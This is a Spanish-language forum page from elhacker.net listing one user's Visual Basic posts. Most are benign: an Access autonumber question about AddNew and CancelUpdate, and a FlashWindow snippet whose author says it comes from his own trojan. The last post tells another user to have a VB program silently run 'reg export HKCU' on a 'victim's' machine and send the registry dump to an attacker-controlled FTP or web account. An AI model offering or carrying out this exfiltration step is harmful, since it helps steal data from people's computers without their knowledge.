elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: [1]
1  Programación / Programación Visual Basic / Re: problemilla con BD y Visual Basic en: 19 Mayo 2008, 10:14 am
Teneis razon en las 2 cosas..
Mejor me abro un formulario aparte o algo por el estilo para poder almacenar los datos antes de confirmacion el guardado.
Ya, se que es una basura pero queria empezar a meterme un poco en el mundillo este de las BD y queria empezar desde abajo, pero si probare otras cosas.

Muchas gracias skullsp y cAssiAni ;)
2  Programación / Programación Visual Basic / problemilla con BD y Visual Basic en: 19 Mayo 2008, 04:08 am
Hola, tengo un problemilla con una aplicación que estoy haciendo...y queria saber si alguien me puede echar una mano...
Es un programa que accede a una BD de Access y permite leer, escribir..lo tipico..vamos..El 'problema' que tengo es que cuando le doy a Insertar nuevo registro el propio control DATA de VB me genera un número ( cosa logica porque en la base de datos este campo lo defini como autonumerico ) para el nuevo registro. Espero haberme explicado bien hasta este punto..ahora pondre codigo para que lo entiendan mejor.

Si yo quiero cancelar ese nuevo registro, es decir, no crearlo, VB ya lo escribe en la BD, entonces siempre me esta 'creando' registros vacios, y aunque no existan fisicamente, ya no dispongo de ese numero ID para cuando quiera crear uno de verdad.

Por ejemplo, voy por el registro 7 y digo de Añadir uno nuevo..VB me crea el 8 en la BD...pero digamos que no quiero escribir nada, pues lo cancelo pero la BD ya se ha actualizado con un nuevo registro mas que en realidad no existe y el numero de ID de registro crece sin control.... :-\ :-\

Codigo:

    'añadimos un registro..
    Data1.Recordset.AddNew

si lo quiero cancelar, escribo esto:
    'cancelamos la edicion/modificacion del registro..
    Data1.Recordset.CancelUpdate

pero ya es tarde, la BD ya ha sido modificada...y el ID de registro ya se ha perdido.


Hay alguna forma de cancelar este proceso y que no guarde en la BD ??????
Ya no se que hacer...he probado mil cosas y buscado por todas partes...ayudenme porfavor..Gracias :-(
3  Programación / Programación Visual Basic / Re: Cambiar color del boton en la lista de ventanas abiertas en: 25 Noviembre 2007, 02:39 am
Hola Lambda haber si esto te ayuda...yo tengo un troyano que incorpora sistema de chat y cuando recibe un mensaje parpadea la ventana..

Private Declare Function FlashWindow Lib "user32" (ByVal hWnd As Long, ByVal bInvert As Long) As Long

Private Sub Timer1_timer()
    Dim nReturnValue As Integer
    nReturnValue = FlashWindow(Form1.hWnd, True)
End Sub

Un saludo :P
4  Programación / Programación Visual Basic / Re: Envio de datos del registro de win xp en: 23 Noviembre 2007, 21:08 pm
Hola ^HtCc, haber si esto te sirve..
Desde VB llamas a MSDOS y ejecutas este parametro:

reg export HKCU _registro.reg

Se creara un archivo .reg con toda la informacion de esa clave del registro de tu victima, y entonces ese archivo te lo puedes enviar a una cuenta FTP, ej: http://usuarios.lycos.es/htcc

Ahora solo tienes que mirar tu pagina web y ahi tendras ese archivo..
Un saludo, espero que te sirva de ayuda!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines